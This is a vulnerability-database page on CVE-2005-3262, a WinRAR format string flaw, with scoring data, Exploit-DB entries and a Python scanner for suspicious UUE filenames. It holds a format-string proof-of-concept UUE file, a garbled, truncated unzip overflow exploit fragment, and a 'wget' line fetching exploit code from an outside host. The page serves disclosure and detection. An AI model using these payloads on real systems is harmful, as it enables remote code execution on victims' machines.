CVE-2005-3262
Published 2005-10-20
Priority: P3, 44, high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: yes
EPSS: 8.79% (94.5th percentile)
Format string vulnerability in RARLAB WinRAR 2.90 through 3.50 allows remote attackers to execute arbitrary code via format string specifiers in a UUE/XXE file, which are not properly handled when WinRAR displays diagnostic errors related to an invalid filename.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rarlab | winrar | — | — |
Exploit-DB
Info-ZIP UnZip 5.x - File Name Buffer Overflow
exploitdb·2005-12-19
CVE-2005-4667 Info-ZIP UnZip 5.x - File Name Buffer Overflow
---
// source: https://www.securityfocus.com/bid/15968/info
Info-ZIP 'unzip' is susceptible to a filename buffer-overflow vulnerability. The application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
This issue allows attackers to execute arbitrary machine code in the context of users running the affected application.
/*
By DVDMAN ([email protected])[email protected]
http://www.snosoft.com
http://WWW.L33TSECURITY.COM
L33T SECURITY
Keep It Private
based on code by hackbox.ath.cx
> wget http://hackbox.ath.cx/mizc/unzip-expl.c
lame unzip
#include
#include
#define MAX "\x39\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
#define BUF 3264+1900+20000
#define LOC 3262
Exploit-DB
RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String
exploitdb·2005-10-11
CVE-2005-3262 RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String
---
source: https://www.securityfocus.com/bid/15062/info
WinRAR is prone to multiple remote vulnerabilities. These issues include a format string and a buffer overflow vulnerability. Successful exploitation may allow an attacker to execute arbitrary code on a vulnerable computer.
WinRAR 3.50 and prior versions are vulnerable to these issues.
begin 644 %0.8x.%0.8x.%0.8x.%0.8x.%0.8xAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
`
end
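A defensive check for the condition this entry describes, as an added example (not code from the original page, Exploit-DB or RARLAB): it scans UUE/XXE text for `begin <mode> <filename>` header lines and flags filenames that contain printf-style conversion specifiers. The function names and the sample input are constructed for illustration.

```python
import re

# UUE and XXE payloads both start with: "begin <octal mode> <filename>"
BEGIN_RE = re.compile(r"^begin\s+([0-7]{3,4})\s+(.+)$")

# printf-style conversion: %[flags][width][.precision][length]type
# "%%" is matched first so a literal percent sign is never reported.
FORMAT_SPEC_RE = re.compile(
    r"%%|%[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?(?:hh|h|ll|l|L|j|z|t)?"
    r"([diouxXeEfgGaAcsSpn])"
)

def format_specs(name):
    """Return every conversion specifier found in a filename string."""
    return [m.group(0) for m in FORMAT_SPEC_RE.finditer(name) if m.group(1)]

def scan_uue(text):
    """Return (line number, filename, specifiers) for each suspicious header."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        header = BEGIN_RE.match(line)
        if not header:
            continue
        specs = format_specs(header.group(2))
        if specs:
            findings.append((lineno, header.group(2), specs))
    return findings

# Constructed sample: one benign member, one header shaped like the entry
# above (shortened), and one filename with an escaped percent sign.
SAMPLE = "\n".join([
    "begin 644 report.txt",
    "#0V%T",
    "`",
    "end",
    "begin 644 %0.8x.%0.8x.AAAA",
    "`",
    "end",
    "begin 644 100%%done.txt",
    "`",
    "end",
])

if __name__ == "__main__":
    for lineno, name, specs in scan_uue(SAMPLE):
        print(f"line {lineno}: filename {name!r} contains {specs}")
```

A legitimate filename such as one containing `% d` also matches, so treat hits as candidates for review; on the rendering side, the underlying fix is to pass the filename as an argument to a constant format string.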
http://secunia.com/advisories/16973/
http://secunia.com/secunia_research/2005-53/advisory/
http://www.rarlabs.com/rarnew.htm
http://www.securityfocus.com/bid/15062